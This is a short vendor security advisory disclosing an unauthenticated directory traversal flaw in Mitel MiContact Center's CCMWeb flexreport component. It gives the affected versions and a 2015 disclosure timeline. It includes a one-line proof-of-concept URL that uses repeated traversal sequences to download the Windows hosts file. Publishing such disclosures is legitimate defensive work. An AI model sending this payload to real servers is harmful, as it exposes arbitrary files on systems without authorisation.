Advisory Information
Title: Mitel CCMWeb Unauthenticated Local File Inclusion
Date Published:
Advisory Summary
A lack of input validation allows an attacker to download arbitrary files from the server.
Vendor
Mitel
Affected Software
| Product | Version |
| MiCC (CcmWeb | 7.x and earlier |
Description of Issue
A local file inclusion vulnerability was discovered in the MiContact Center version 7.1. This vulnerability was found in the flexreport component of CCMWeb and could be exploited by an unauthenticated user to reveal arbitrary files by utilising directory traversal sequences to download files.
PoC
The following proof of concept downloads the Windows host file.
http://1.1.1.1/ccmweb/flexreport.ashx?filename=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
Timeline
Reported – 26th January 2015
Accepted – 31st March 2015
Advisory Published – 4th October 2015